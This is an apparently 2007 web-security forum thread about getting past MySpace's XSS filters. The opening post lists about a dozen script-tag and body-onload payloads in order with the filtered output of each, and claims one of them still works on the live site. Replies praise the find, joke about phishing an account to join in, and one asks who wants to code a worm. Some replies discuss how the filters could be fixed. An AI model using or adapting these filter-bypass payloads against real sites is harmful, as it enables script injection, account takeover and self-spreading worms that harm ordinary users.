Ok, with everyone going after Myspace at the moment I was feeling alittle left out. Anyways i haven't really had anytime until tonight to check out the site and see if it was still vunerable to the non-alpha-non-digit XSS vector spoilts that have been published.

Sadly, whilst those specific spoilts were patched, it wasn't actually fixed, it seems they still don't grasp the issues involved and therefore are still vunerable.

The code.
<body onload<scrip=alert('xss');>

The result
<body onload..=alert('xss');>

This should be nothing new to any of us, as, with the previous spoilt discovered by kuza55 I simply used their filters against them (and there are lots of them).

For some fun i decided to post the codes i was testing with (in order) so new users can see how perhaps we might go after something like this (originally i was going to go after an all browser spoilt and as you can see that with the first couple of codes i was focusing on getting the script tags to fire. However I then realised i could easily use what i was testing with the re-create the firefox 0 day. I then spent the next couple of efforts chasing my tail before i realised i already had it (my syntax was messy).

<scr<!--ipt-->alert('xss');>					..-->alert('xss');>

<scrip<scr<!--ipt-->alert('xss');>				<scrip..-->alert('xss');>

<script<scr<!--ipt-->alert('xss');>				<scrip..-->alert('xss');>

<scrip<scriptt-->lert('xss');>					<scrip..t-->lert('xss');>

<scrip<tscr<!--ipt-->lert('xss');>				..scr<!-- -->ipt-->lert('xss');>

<scrip<scrip<t>lert('xss');>					<scrip..>lert('xss');>

<body onload<scrip<t>lert('xss');</script>			<body onload..>lert('xss');..>

<body onload<scrip<t>=alert('xss');</script>			<body onload..>=alert('xss');..>

<body onload<scrip<t=alert('xss');</script>			<body onload..=alert('xss');..>

<body onload<scrip<t=alert('xss');>				<body onload..=alert('xss');>

<body onload<script=alert('xss');>				<body onload..=alert('xss');>

Hopefully myspace can patch this properly this time... If not i will be posting more spoilts for the site soon.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Haha your turn! Well done, as RSnake mentioned before this could quite easily be solved by using a while loop to check the code before it is saved on the profile. I think myspace have pretty good XSS filters, whilst still managing to keep the functionality of the html tags they allow.

Nice work!

Wow super!

Awesome find!

-bubbles
[webmastertutorials.net]

Do we all get turns on MySpace? Alas, too lazy to even signup there ^^

Well considering how often XSS for myspace comes up, you could just phish yourself an account :)

-bubbles
[webmastertutorials.net]

Yeah but, it's getting a little boring to me to hear about a XSS in MySpace, It's like an XSS in eBay or Yah!ho? dunno, old news. They just suck at being secure, Seems many do the work for the MySpace developers, My take on it is to let them figuring their own things out, and not the easy way.

jungsonn Wrote:
-------------------------------------------------------
> Do we all get turns on MySpace? Alas, too lazy to
> even signup there ^^


ahaha this is SO true!

jungsonn Wrote:
-------------------------------------------------------
Yeah but, it's getting a little boring to me to hear about a XSS in MySpace, It's like an XSS in eBay or Yah!ho? dunno, old news. They just suck at being secure, Seems many do the work for the MySpace developers, My take on it is to let them figuring their own things out, and not the easy way.


digi7al64 Wrote:
-------------------------------------------------------
lol. Personally as someone who dabbles in hacking/pen testing/code auditing etc i like to see how sites handle the development of their security modules when issues arise. ATM we have a perfect example of re-active security rather then pro-active security. This is why the non-alpha-non-digit XSS vector continues to work and will continue to work until they examine the issues of why it is happening.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/09/2007 04:50PM by digi7al64.

Ill be looking out for them patching it as i've just visited the ha.ckers.org homepage and the title is getting quite funny. Just one more find and we'll have MySpace 0-Day Again (Again (Again) (Again)) all from the same cause!

Interestingly i have a few other vectors up my sleeve at this time.

However rather then release them all in one go, I will wait and see what happens and how the approach this particular fix... will they fix it properly or will they only address this particular vector?

Also i am sort of hoping (since they are the cleverest people) whether they will remove the .. altogether and thereby allow us to implement other attack methods (which is quite possible, they seemed determined to allow the onload tag to stay in place).

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Anyone wanna try coding a worm?

About the while loops for the programmers like RSnake mentioned in his wit, isn't it a nice idea to write a while > foreach loop to poke with xss dorks at their filters? anyway, that's what I would do in such a case cause most from the above examples look like eachother ^^

The fragmentation works again, with a little tweaking, but for now i can't see much point in using it as this method has the same outcome but with less effort.